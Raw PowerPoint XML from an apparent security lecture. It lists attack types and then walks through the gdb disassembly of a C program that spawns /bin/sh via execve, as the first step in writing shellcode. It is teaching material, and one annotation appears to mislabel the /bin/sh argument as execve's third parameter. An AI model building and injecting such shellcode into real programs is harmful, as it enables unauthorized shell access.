            <a:ext cx="7123113" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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Masquerading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(breach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authentication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Pretending to be an authorized user to escalate privileges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Replay attack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As is or with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message modification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Man-in-the-middle attack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Intruder sits in data flow, masquerading as sender to receiver and vice versa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Session hijacking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Intercept an already-established session to bypass authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1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75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2146469"/>
            <a:ext cx="7620000" cy="353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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> main() { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>   char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>   array[0] = "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>   array[1] = NULL;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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(array[0], array, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>   return 0;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878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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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3602" y="1267361"/>
            <a:ext cx="4670580" cy="1323439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57800" y="1534180"/>
            <a:ext cx="3429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Setup main function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1095045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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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25146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990600"/>
            <a:ext cx="3429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Move the address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>” to array[0] 0x18(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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00476" y="3352800"/>
            <a:ext cx="2718283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8806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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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28194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990600"/>
            <a:ext cx="381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Move Null to array[1] 0x1c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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00476" y="3638490"/>
            <a:ext cx="2718283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16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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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31242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990600"/>
            <a:ext cx="381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Move array[0] to %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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00476" y="4019490"/>
            <a:ext cx="3614924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303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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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348609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990600"/>
            <a:ext cx="381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Put the third parameter of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (NULL) onto the stack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00476" y="4019490"/>
            <a:ext cx="3614924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3537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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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37338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990600"/>
            <a:ext cx="381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Load the address of array into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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00476" y="4019490"/>
            <a:ext cx="3614924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0162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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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40386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990600"/>
            <a:ext cx="381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Put %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> onto the stack as the second parameter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00476" y="4019490"/>
            <a:ext cx="3614924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44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90600"/>
            <a:ext cx="525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main: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&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;: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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea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%edx,0x4(%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&lt;+45&gt;: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&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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4384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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0]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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p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(array[0], array, NULL);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43434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774918"/>
            <a:ext cx="381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Put %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (the address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>”)onto the stack as the third parameter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00476" y="4019490"/>
            <a:ext cx="3614924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6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990600"/>
            <a:ext cx="5257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main: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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+3&gt;:     and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+6&gt;:     sub    $0x20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x80c57a8,0x18(%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&lt;+17&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x1c(%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&lt;+25&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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&lt;+29&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   $0x0,0x8(%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&lt;+37&gt;:    lea    0x18(%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%edx,0x4(%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&lt;+45&gt;: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+48&gt;:    call   0x8053ae0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+53&gt;:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+58&gt;:    leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;+59&gt;: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438400"/>
            <a:ext cx="502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char *array[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[0] = "/bin/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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   array[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(array[0], array, NULL);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28600" y="46482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334000" y="774918"/>
            <a:ext cx="3810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Call the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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5300476" y="4019490"/>
            <a:ext cx="3614924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6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1038" y="182563"/>
